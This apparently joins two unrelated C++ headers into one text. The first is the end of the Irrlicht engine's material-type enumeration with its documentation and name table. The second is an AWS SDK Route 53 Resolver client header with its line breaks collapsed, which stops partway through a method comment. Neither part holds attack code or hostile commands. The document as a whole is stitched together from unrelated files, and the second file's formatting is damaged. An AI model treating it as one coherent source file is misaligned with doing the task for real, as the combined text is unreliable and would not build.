		ignored. The texture colors are effectively multiplied by 4
		for brightening. Like known in DirectX as D3DTOP_MODULATE4X. */
		EMT_LIGHTMAP_M4,

		//! Like EMT_LIGHTMAP, but also supports dynamic lighting.
		EMT_LIGHTMAP_LIGHTING,

		//! Like EMT_LIGHTMAP_M2, but also supports dynamic lighting.
		EMT_LIGHTMAP_LIGHTING_M2,

		//! Like EMT_LIGHTMAP_M4, but also supports dynamic lighting.
		EMT_LIGHTMAP_LIGHTING_M4,

		//! Detail mapped material.
		/** The first texture is diffuse color map, the second is added
		to this and usually displayed with a bigger scale value so that
		it adds more detail. The detail map is added to the diffuse map
		using ADD_SIGNED, so that it is possible to add and subtract
		color from the diffuse map. For example a value of
		(127,127,127) will not change the appearance of the diffuse map
		at all. Often used for terrain rendering. */
		EMT_DETAIL_MAP,

		//! Look like a reflection of the environment around it.
		/** To make this possible, a texture called 'sphere map' is
		used, which must be set as the first texture. */
		EMT_SPHERE_MAP,

		//! A reflecting material with an optional non reflecting texture layer.
		/** The reflection map should be set as first texture. */
		EMT_REFLECTION_2_LAYER,

		//! A transparent material.
		/** Only the first texture is used. The new color is calculated
		by simply adding the source color and the dest color. This
		means if for example a billboard using a texture with black
		background and a red circle on it is drawn with this material,
		the result is that only the red circle will be drawn a little
		bit transparent, and everything which was black is 100%
		transparent and not visible. This material type is useful for
		particle effects. */
		EMT_TRANSPARENT_ADD_COLOR,

		//! Makes the material transparent based on the texture alpha channel.
		/** The final color is blended together from the destination
		color and the texture color, using the alpha channel value as
		blend factor. Only first texture is used. If you are using
		this material with small textures, it is a good idea to load
		the texture in 32 bit mode
		(video::IVideoDriver::setTextureCreationFlag()). Also, an alpha
		ref is used, which can be manipulated using
		SMaterial::MaterialTypeParam. This value controls how sharp the
		edges become when going from a transparent to a solid spot on
		the texture. */
		EMT_TRANSPARENT_ALPHA_CHANNEL,

		//! Makes the material transparent based on the texture alpha channel.
		/** If the alpha channel value is greater than 127, a pixel is
		written to the target, otherwise not. This material does not
		use alpha blending and is a lot faster than
		EMT_TRANSPARENT_ALPHA_CHANNEL. It is ideal for drawing stuff
		like leaves of plants, because the borders are not blurry but
		sharp. Only first texture is used. If you are using this
		material with small textures and 3d object, it is a good idea
		to load the texture in 32 bit mode
		(video::IVideoDriver::setTextureCreationFlag()). */
		EMT_TRANSPARENT_ALPHA_CHANNEL_REF,

		//! Makes the material transparent based on the vertex alpha value.
		EMT_TRANSPARENT_VERTEX_ALPHA,

		//! A transparent reflecting material with an optional additional non reflecting texture layer.
		/** The reflection map should be set as first texture. The
		transparency depends on the alpha value in the vertex colors. A
		texture which will not reflect can be set as second texture.
		Please note that this material type is currently not 100%
		implemented in OpenGL. */
		EMT_TRANSPARENT_REFLECTION_2_LAYER,

		//! A solid normal map renderer.
		/** First texture is the color map, the second should be the
		normal map. Note that you should use this material only when
		drawing geometry consisting of vertices of type
		S3DVertexTangents (EVT_TANGENTS). You can convert any mesh into
		this format using IMeshManipulator::createMeshWithTangents()
		(See SpecialFX2 Tutorial). This shader runs on vertex shader
		1.1 and pixel shader 1.1 capable hardware and falls back to a
		fixed function lighted material if this hardware is not
		available. Only two lights are supported by this shader, if
		there are more, the nearest two are chosen. */
		EMT_NORMAL_MAP_SOLID,

		//! A transparent normal map renderer.
		/** First texture is the color map, the second should be the
		normal map. Note that you should use this material only when
		drawing geometry consisting of vertices of type
		S3DVertexTangents (EVT_TANGENTS). You can convert any mesh into
		this format using IMeshManipulator::createMeshWithTangents()
		(See SpecialFX2 Tutorial). This shader runs on vertex shader
		1.1 and pixel shader 1.1 capable hardware and falls back to a
		fixed function lighted material if this hardware is not
		available. Only two lights are supported by this shader, if
		there are more, the nearest two are chosen. */
		EMT_NORMAL_MAP_TRANSPARENT_ADD_COLOR,

		//! A transparent (based on the vertex alpha value) normal map renderer.
		/** First texture is the color map, the second should be the
		normal map. Note that you should use this material only when
		drawing geometry consisting of vertices of type
		S3DVertexTangents (EVT_TANGENTS). You can convert any mesh into
		this format using IMeshManipulator::createMeshWithTangents()
		(See SpecialFX2 Tutorial). This shader runs on vertex shader
		1.1 and pixel shader 1.1 capable hardware and falls back to a
		fixed function lighted material if this hardware is not
		available. Only two lights are supported by this shader, if
		there are more, the nearest two are chosen. */
		EMT_NORMAL_MAP_TRANSPARENT_VERTEX_ALPHA,

		//! Just like EMT_NORMAL_MAP_SOLID, but uses parallax mapping.
		/** Looks a lot more realistic. This only works when the
		hardware supports at least vertex shader 1.1 and pixel shader
		1.4. First texture is the color map, the second should be the
		normal map. The normal map texture should contain the height
		value in the alpha component. The
		IVideoDriver::makeNormalMapTexture() method writes this value
		automatically when creating normal maps from a heightmap when
		using a 32 bit texture. The height scale of the material
		(affecting the bumpiness) is being controlled by the
		SMaterial::MaterialTypeParam member. If set to zero, the
		default value (0.02f) will be applied. Otherwise the value set
		in SMaterial::MaterialTypeParam is taken. This value depends on
		with which scale the texture is mapped on the material. Too
		high or low values of MaterialTypeParam can result in strange
		artifacts. */
		EMT_PARALLAX_MAP_SOLID,

		//! A material like EMT_PARALLAX_MAP_SOLID, but transparent.
		/** Using EMT_TRANSPARENT_ADD_COLOR as base material. */
		EMT_PARALLAX_MAP_TRANSPARENT_ADD_COLOR,

		//! A material like EMT_PARALLAX_MAP_SOLID, but transparent.
		/** Using EMT_TRANSPARENT_VERTEX_ALPHA as base material. */
		EMT_PARALLAX_MAP_TRANSPARENT_VERTEX_ALPHA,

		//! BlendFunc = source * sourceFactor + dest * destFactor ( E_BLEND_FUNC )
		/** Using only first texture. Generic blending method. */
		EMT_ONETEXTURE_BLEND,

		//! This value is not used. It only forces this enumeration to compile to 32 bit.
		EMT_FORCE_32BIT = 0x7fffffff
	};

	//! Array holding the built in material type names.
	/** Indexed by E_MATERIAL_TYPE; order must match the enum above.
	Null-terminated so it can be iterated without a count. */
	const char* const sBuiltInMaterialTypeNames[] =
	{
		"solid",
		"solid_2layer",
		"lightmap",
		"lightmap_add",
		"lightmap_m2",
		"lightmap_m4",
		"lightmap_light",
		"lightmap_light_m2",
		"lightmap_light_m4",
		"detail_map",
		"sphere_map",
		"reflection_2layer",
		"trans_add",
		"trans_alphach",
		"trans_alphach_ref",
		"trans_vertex_alpha",
		"trans_reflection_2layer",
		"normalmap_solid",
		"normalmap_trans_add",
		"normalmap_trans_vertexalpha",
		"parallaxmap_solid",
		"parallaxmap_trans_add",
		"parallaxmap_trans_vertexalpha",
		"onetexture_blend",
		0
	};

} // end namespace video
} // end namespace irr

#endif // __E_MATERIAL_TYPES_H_INCLUDED__
/** * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. * SPDX-License-Identifier: Apache-2.0. */ #pragma once #include <aws/route53resolver/Route53Resolver_EXPORTS.h> #include <aws/route53resolver/Route53ResolverErrors.h> #include <aws/core/client/AWSError.h> #include <aws/core/client/ClientConfiguration.h> #include <aws/core/client/AWSClient.h> #include <aws/core/utils/memory/stl/AWSString.h> #include <aws/core/utils/json/JsonSerializer.h> #include <aws/route53resolver/model/AssociateResolverEndpointIpAddressResult.h> #include <aws/route53resolver/model/AssociateResolverQueryLogConfigResult.h> #include <aws/route53resolver/model/AssociateResolverRuleResult.h> #include <aws/route53resolver/model/CreateResolverEndpointResult.h> #include <aws/route53resolver/model/CreateResolverQueryLogConfigResult.h> #include <aws/route53resolver/model/CreateResolverRuleResult.h> #include <aws/route53resolver/model/DeleteResolverEndpointResult.h> #include <aws/route53resolver/model/DeleteResolverQueryLogConfigResult.h> #include <aws/route53resolver/model/DeleteResolverRuleResult.h> #include <aws/route53resolver/model/DisassociateResolverEndpointIpAddressResult.h> #include <aws/route53resolver/model/DisassociateResolverQueryLogConfigResult.h> #include <aws/route53resolver/model/DisassociateResolverRuleResult.h> #include <aws/route53resolver/model/GetResolverDnssecConfigResult.h> #include <aws/route53resolver/model/GetResolverEndpointResult.h> #include <aws/route53resolver/model/GetResolverQueryLogConfigResult.h> #include <aws/route53resolver/model/GetResolverQueryLogConfigAssociationResult.h> #include <aws/route53resolver/model/GetResolverQueryLogConfigPolicyResult.h> #include <aws/route53resolver/model/GetResolverRuleResult.h> #include <aws/route53resolver/model/GetResolverRuleAssociationResult.h> #include <aws/route53resolver/model/GetResolverRulePolicyResult.h> #include <aws/route53resolver/model/ListResolverDnssecConfigsResult.h> #include 
<aws/route53resolver/model/ListResolverEndpointIpAddressesResult.h> #include <aws/route53resolver/model/ListResolverEndpointsResult.h> #include <aws/route53resolver/model/ListResolverQueryLogConfigAssociationsResult.h> #include <aws/route53resolver/model/ListResolverQueryLogConfigsResult.h> #include <aws/route53resolver/model/ListResolverRuleAssociationsResult.h> #include <aws/route53resolver/model/ListResolverRulesResult.h> #include <aws/route53resolver/model/ListTagsForResourceResult.h> #include <aws/route53resolver/model/PutResolverQueryLogConfigPolicyResult.h> #include <aws/route53resolver/model/PutResolverRulePolicyResult.h> #include <aws/route53resolver/model/TagResourceResult.h> #include <aws/route53resolver/model/UntagResourceResult.h> #include <aws/route53resolver/model/UpdateResolverDnssecConfigResult.h> #include <aws/route53resolver/model/UpdateResolverEndpointResult.h> #include <aws/route53resolver/model/UpdateResolverRuleResult.h> #include <aws/core/client/AsyncCallerContext.h> #include <aws/core/http/HttpTypes.h> #include <future> #include <functional> namespace Aws { namespace Http { class HttpClient; class HttpClientFactory; } // namespace Http namespace Utils { template< typename R, typename E> class Outcome; namespace Threading { class Executor; } // namespace Threading } // namespace Utils namespace Auth { class AWSCredentials; class AWSCredentialsProvider; } // namespace Auth namespace Client { class RetryStrategy; } // namespace Client namespace Route53Resolver { namespace Model { class AssociateResolverEndpointIpAddressRequest; class AssociateResolverQueryLogConfigRequest; class AssociateResolverRuleRequest; class CreateResolverEndpointRequest; class CreateResolverQueryLogConfigRequest; class CreateResolverRuleRequest; class DeleteResolverEndpointRequest; class DeleteResolverQueryLogConfigRequest; class DeleteResolverRuleRequest; class DisassociateResolverEndpointIpAddressRequest; class DisassociateResolverQueryLogConfigRequest; class 
DisassociateResolverRuleRequest; class GetResolverDnssecConfigRequest; class GetResolverEndpointRequest; class GetResolverQueryLogConfigRequest; class GetResolverQueryLogConfigAssociationRequest; class GetResolverQueryLogConfigPolicyRequest; class GetResolverRuleRequest; class GetResolverRuleAssociationRequest; class GetResolverRulePolicyRequest; class ListResolverDnssecConfigsRequest; class ListResolverEndpointIpAddressesRequest; class ListResolverEndpointsRequest; class ListResolverQueryLogConfigAssociationsRequest; class ListResolverQueryLogConfigsRequest; class ListResolverRuleAssociationsRequest; class ListResolverRulesRequest; class ListTagsForResourceRequest; class PutResolverQueryLogConfigPolicyRequest; class PutResolverRulePolicyRequest; class TagResourceRequest; class UntagResourceRequest; class UpdateResolverDnssecConfigRequest; class UpdateResolverEndpointRequest; class UpdateResolverRuleRequest; typedef Aws::Utils::Outcome<AssociateResolverEndpointIpAddressResult, Route53ResolverError> AssociateResolverEndpointIpAddressOutcome; typedef Aws::Utils::Outcome<AssociateResolverQueryLogConfigResult, Route53ResolverError> AssociateResolverQueryLogConfigOutcome; typedef Aws::Utils::Outcome<AssociateResolverRuleResult, Route53ResolverError> AssociateResolverRuleOutcome; typedef Aws::Utils::Outcome<CreateResolverEndpointResult, Route53ResolverError> CreateResolverEndpointOutcome; typedef Aws::Utils::Outcome<CreateResolverQueryLogConfigResult, Route53ResolverError> CreateResolverQueryLogConfigOutcome; typedef Aws::Utils::Outcome<CreateResolverRuleResult, Route53ResolverError> CreateResolverRuleOutcome; typedef Aws::Utils::Outcome<DeleteResolverEndpointResult, Route53ResolverError> DeleteResolverEndpointOutcome; typedef Aws::Utils::Outcome<DeleteResolverQueryLogConfigResult, Route53ResolverError> DeleteResolverQueryLogConfigOutcome; typedef Aws::Utils::Outcome<DeleteResolverRuleResult, Route53ResolverError> DeleteResolverRuleOutcome; typedef 
Aws::Utils::Outcome<DisassociateResolverEndpointIpAddressResult, Route53ResolverError> DisassociateResolverEndpointIpAddressOutcome; typedef Aws::Utils::Outcome<DisassociateResolverQueryLogConfigResult, Route53ResolverError> DisassociateResolverQueryLogConfigOutcome; typedef Aws::Utils::Outcome<DisassociateResolverRuleResult, Route53ResolverError> DisassociateResolverRuleOutcome; typedef Aws::Utils::Outcome<GetResolverDnssecConfigResult, Route53ResolverError> GetResolverDnssecConfigOutcome; typedef Aws::Utils::Outcome<GetResolverEndpointResult, Route53ResolverError> GetResolverEndpointOutcome; typedef Aws::Utils::Outcome<GetResolverQueryLogConfigResult, Route53ResolverError> GetResolverQueryLogConfigOutcome; typedef Aws::Utils::Outcome<GetResolverQueryLogConfigAssociationResult, Route53ResolverError> GetResolverQueryLogConfigAssociationOutcome; typedef Aws::Utils::Outcome<GetResolverQueryLogConfigPolicyResult, Route53ResolverError> GetResolverQueryLogConfigPolicyOutcome; typedef Aws::Utils::Outcome<GetResolverRuleResult, Route53ResolverError> GetResolverRuleOutcome; typedef Aws::Utils::Outcome<GetResolverRuleAssociationResult, Route53ResolverError> GetResolverRuleAssociationOutcome; typedef Aws::Utils::Outcome<GetResolverRulePolicyResult, Route53ResolverError> GetResolverRulePolicyOutcome; typedef Aws::Utils::Outcome<ListResolverDnssecConfigsResult, Route53ResolverError> ListResolverDnssecConfigsOutcome; typedef Aws::Utils::Outcome<ListResolverEndpointIpAddressesResult, Route53ResolverError> ListResolverEndpointIpAddressesOutcome; typedef Aws::Utils::Outcome<ListResolverEndpointsResult, Route53ResolverError> ListResolverEndpointsOutcome; typedef Aws::Utils::Outcome<ListResolverQueryLogConfigAssociationsResult, Route53ResolverError> ListResolverQueryLogConfigAssociationsOutcome; typedef Aws::Utils::Outcome<ListResolverQueryLogConfigsResult, Route53ResolverError> ListResolverQueryLogConfigsOutcome; typedef Aws::Utils::Outcome<ListResolverRuleAssociationsResult, 
Route53ResolverError> ListResolverRuleAssociationsOutcome; typedef Aws::Utils::Outcome<ListResolverRulesResult, Route53ResolverError> ListResolverRulesOutcome; typedef Aws::Utils::Outcome<ListTagsForResourceResult, Route53ResolverError> ListTagsForResourceOutcome; typedef Aws::Utils::Outcome<PutResolverQueryLogConfigPolicyResult, Route53ResolverError> PutResolverQueryLogConfigPolicyOutcome; typedef Aws::Utils::Outcome<PutResolverRulePolicyResult, Route53ResolverError> PutResolverRulePolicyOutcome; typedef Aws::Utils::Outcome<TagResourceResult, Route53ResolverError> TagResourceOutcome; typedef Aws::Utils::Outcome<UntagResourceResult, Route53ResolverError> UntagResourceOutcome; typedef Aws::Utils::Outcome<UpdateResolverDnssecConfigResult, Route53ResolverError> UpdateResolverDnssecConfigOutcome; typedef Aws::Utils::Outcome<UpdateResolverEndpointResult, Route53ResolverError> UpdateResolverEndpointOutcome; typedef Aws::Utils::Outcome<UpdateResolverRuleResult, Route53ResolverError> UpdateResolverRuleOutcome; typedef std::future<AssociateResolverEndpointIpAddressOutcome> AssociateResolverEndpointIpAddressOutcomeCallable; typedef std::future<AssociateResolverQueryLogConfigOutcome> AssociateResolverQueryLogConfigOutcomeCallable; typedef std::future<AssociateResolverRuleOutcome> AssociateResolverRuleOutcomeCallable; typedef std::future<CreateResolverEndpointOutcome> CreateResolverEndpointOutcomeCallable; typedef std::future<CreateResolverQueryLogConfigOutcome> CreateResolverQueryLogConfigOutcomeCallable; typedef std::future<CreateResolverRuleOutcome> CreateResolverRuleOutcomeCallable; typedef std::future<DeleteResolverEndpointOutcome> DeleteResolverEndpointOutcomeCallable; typedef std::future<DeleteResolverQueryLogConfigOutcome> DeleteResolverQueryLogConfigOutcomeCallable; typedef std::future<DeleteResolverRuleOutcome> DeleteResolverRuleOutcomeCallable; typedef std::future<DisassociateResolverEndpointIpAddressOutcome> DisassociateResolverEndpointIpAddressOutcomeCallable; 
typedef std::future<DisassociateResolverQueryLogConfigOutcome> DisassociateResolverQueryLogConfigOutcomeCallable; typedef std::future<DisassociateResolverRuleOutcome> DisassociateResolverRuleOutcomeCallable; typedef std::future<GetResolverDnssecConfigOutcome> GetResolverDnssecConfigOutcomeCallable; typedef std::future<GetResolverEndpointOutcome> GetResolverEndpointOutcomeCallable; typedef std::future<GetResolverQueryLogConfigOutcome> GetResolverQueryLogConfigOutcomeCallable; typedef std::future<GetResolverQueryLogConfigAssociationOutcome> GetResolverQueryLogConfigAssociationOutcomeCallable; typedef std::future<GetResolverQueryLogConfigPolicyOutcome> GetResolverQueryLogConfigPolicyOutcomeCallable; typedef std::future<GetResolverRuleOutcome> GetResolverRuleOutcomeCallable; typedef std::future<GetResolverRuleAssociationOutcome> GetResolverRuleAssociationOutcomeCallable; typedef std::future<GetResolverRulePolicyOutcome> GetResolverRulePolicyOutcomeCallable; typedef std::future<ListResolverDnssecConfigsOutcome> ListResolverDnssecConfigsOutcomeCallable; typedef std::future<ListResolverEndpointIpAddressesOutcome> ListResolverEndpointIpAddressesOutcomeCallable; typedef std::future<ListResolverEndpointsOutcome> ListResolverEndpointsOutcomeCallable; typedef std::future<ListResolverQueryLogConfigAssociationsOutcome> ListResolverQueryLogConfigAssociationsOutcomeCallable; typedef std::future<ListResolverQueryLogConfigsOutcome> ListResolverQueryLogConfigsOutcomeCallable; typedef std::future<ListResolverRuleAssociationsOutcome> ListResolverRuleAssociationsOutcomeCallable; typedef std::future<ListResolverRulesOutcome> ListResolverRulesOutcomeCallable; typedef std::future<ListTagsForResourceOutcome> ListTagsForResourceOutcomeCallable; typedef std::future<PutResolverQueryLogConfigPolicyOutcome> PutResolverQueryLogConfigPolicyOutcomeCallable; typedef std::future<PutResolverRulePolicyOutcome> PutResolverRulePolicyOutcomeCallable; typedef std::future<TagResourceOutcome> 
TagResourceOutcomeCallable; typedef std::future<UntagResourceOutcome> UntagResourceOutcomeCallable; typedef std::future<UpdateResolverDnssecConfigOutcome> UpdateResolverDnssecConfigOutcomeCallable; typedef std::future<UpdateResolverEndpointOutcome> UpdateResolverEndpointOutcomeCallable; typedef std::future<UpdateResolverRuleOutcome> UpdateResolverRuleOutcomeCallable; } // namespace Model class Route53ResolverClient; typedef std::function<void(const Route53ResolverClient*, const Model::AssociateResolverEndpointIpAddressRequest&, const Model::AssociateResolverEndpointIpAddressOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > AssociateResolverEndpointIpAddressResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::AssociateResolverQueryLogConfigRequest&, const Model::AssociateResolverQueryLogConfigOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > AssociateResolverQueryLogConfigResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::AssociateResolverRuleRequest&, const Model::AssociateResolverRuleOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > AssociateResolverRuleResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::CreateResolverEndpointRequest&, const Model::CreateResolverEndpointOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > CreateResolverEndpointResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::CreateResolverQueryLogConfigRequest&, const Model::CreateResolverQueryLogConfigOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > CreateResolverQueryLogConfigResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::CreateResolverRuleRequest&, const Model::CreateResolverRuleOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > 
CreateResolverRuleResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::DeleteResolverEndpointRequest&, const Model::DeleteResolverEndpointOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > DeleteResolverEndpointResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::DeleteResolverQueryLogConfigRequest&, const Model::DeleteResolverQueryLogConfigOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > DeleteResolverQueryLogConfigResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::DeleteResolverRuleRequest&, const Model::DeleteResolverRuleOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > DeleteResolverRuleResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::DisassociateResolverEndpointIpAddressRequest&, const Model::DisassociateResolverEndpointIpAddressOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > DisassociateResolverEndpointIpAddressResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::DisassociateResolverQueryLogConfigRequest&, const Model::DisassociateResolverQueryLogConfigOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > DisassociateResolverQueryLogConfigResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::DisassociateResolverRuleRequest&, const Model::DisassociateResolverRuleOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > DisassociateResolverRuleResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverDnssecConfigRequest&, const Model::GetResolverDnssecConfigOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverDnssecConfigResponseReceivedHandler; typedef std::function<void(const 
Route53ResolverClient*, const Model::GetResolverEndpointRequest&, const Model::GetResolverEndpointOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverEndpointResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverQueryLogConfigRequest&, const Model::GetResolverQueryLogConfigOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverQueryLogConfigResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverQueryLogConfigAssociationRequest&, const Model::GetResolverQueryLogConfigAssociationOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverQueryLogConfigAssociationResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverQueryLogConfigPolicyRequest&, const Model::GetResolverQueryLogConfigPolicyOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverQueryLogConfigPolicyResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverRuleRequest&, const Model::GetResolverRuleOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverRuleResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverRuleAssociationRequest&, const Model::GetResolverRuleAssociationOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverRuleAssociationResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverRulePolicyRequest&, const Model::GetResolverRulePolicyOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverRulePolicyResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListResolverDnssecConfigsRequest&, const Model::ListResolverDnssecConfigsOutcome&, const 
std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListResolverDnssecConfigsResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListResolverEndpointIpAddressesRequest&, const Model::ListResolverEndpointIpAddressesOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListResolverEndpointIpAddressesResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListResolverEndpointsRequest&, const Model::ListResolverEndpointsOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListResolverEndpointsResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListResolverQueryLogConfigAssociationsRequest&, const Model::ListResolverQueryLogConfigAssociationsOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListResolverQueryLogConfigAssociationsResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListResolverQueryLogConfigsRequest&, const Model::ListResolverQueryLogConfigsOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListResolverQueryLogConfigsResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListResolverRuleAssociationsRequest&, const Model::ListResolverRuleAssociationsOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListResolverRuleAssociationsResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListResolverRulesRequest&, const Model::ListResolverRulesOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListResolverRulesResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListTagsForResourceRequest&, const Model::ListTagsForResourceOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > 
ListTagsForResourceResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::PutResolverQueryLogConfigPolicyRequest&, const Model::PutResolverQueryLogConfigPolicyOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > PutResolverQueryLogConfigPolicyResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::PutResolverRulePolicyRequest&, const Model::PutResolverRulePolicyOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > PutResolverRulePolicyResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::TagResourceRequest&, const Model::TagResourceOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > TagResourceResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::UntagResourceRequest&, const Model::UntagResourceOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > UntagResourceResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::UpdateResolverDnssecConfigRequest&, const Model::UpdateResolverDnssecConfigOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > UpdateResolverDnssecConfigResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::UpdateResolverEndpointRequest&, const Model::UpdateResolverEndpointOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > UpdateResolverEndpointResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::UpdateResolverRuleRequest&, const Model::UpdateResolverRuleOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > UpdateResolverRuleResponseReceivedHandler; /** * <p>When you create a VPC using Amazon VPC, you automatically get DNS resolution * within the VPC from Route 53 Resolver. 
By default, Resolver answers DNS queries * for VPC domain names such as domain names for EC2 instances or ELB load * balancers. Resolver performs recursive lookups against public name servers for * all other domain names.</p> <p>You can also configure DNS resolution between * your VPC and your network over a Direct Connect or VPN connection:</p> <p> * <b>Forward DNS queries from resolvers on your network to Route 53 Resolver</b> * </p> <p>DNS resolvers on your network can forward DNS queries to Resolver in a * specified VPC. This allows your DNS resolvers to easily resolve domain names for * AWS resources such as EC2 instances or records in a Route 53 private hosted * zone. For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resolver.html#resolver-overview-forward-network-to-vpc">How * DNS Resolvers on Your Network Forward DNS Queries to Route 53 Resolver</a> in * the <i>Amazon Route 53 Developer Guide</i>.</p> <p> <b>Conditionally forward * queries from a VPC to resolvers on your network</b> </p> <p>You can configure * Resolver to forward queries that it receives from EC2 instances in your VPCs to * DNS resolvers on your network. To forward selected queries, you create Resolver * rules that specify the domain names for the DNS queries that you want to forward * (such as example.com), and the IP addresses of the DNS resolvers on your network * that you want to forward the queries to. If a query matches multiple rules * (example.com, acme.example.com), Resolver chooses the rule with the most * specific match (acme.example.com) and forwards the query to the IP addresses * that you specified in that rule. 
For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resolver.html#resolver-overview-forward-vpc-to-network">How * Route 53 Resolver Forwards DNS Queries from Your VPCs to Your Network</a> in the * <i>Amazon Route 53 Developer Guide</i>.</p> <p>Like Amazon VPC, Resolver is * regional. In each region where you have VPCs, you can choose whether to forward * queries from your VPCs to your network (outbound queries), from your network to * your VPCs (inbound queries), or both.</p> */ class AWS_ROUTE53RESOLVER_API Route53ResolverClient : public Aws::Client::AWSJsonClient { public: typedef Aws::Client::AWSJsonClient BASECLASS; /** * Initializes client to use DefaultCredentialProviderChain, with default http client factory, and optional client config. If client config * is not specified, it will be initialized to default values. */ Route53ResolverClient(const Aws::Client::ClientConfiguration& clientConfiguration = Aws::Client::ClientConfiguration()); /** * Initializes client to use SimpleAWSCredentialsProvider, with default http client factory, and optional client config. If client config * is not specified, it will be initialized to default values. */ Route53ResolverClient(const Aws::Auth::AWSCredentials& credentials, const Aws::Client::ClientConfiguration& clientConfiguration = Aws::Client::ClientConfiguration()); /** * Initializes client to use specified credentials provider with specified client config. If http client factory is not supplied, * the default http client factory will be used */ Route53ResolverClient(const std::shared_ptr<Aws::Auth::AWSCredentialsProvider>& credentialsProvider, const Aws::Client::ClientConfiguration& clientConfiguration = Aws::Client::ClientConfiguration()); virtual ~Route53ResolverClient(); /** * <p>Adds IP addresses to an inbound or an outbound Resolver endpoint. 
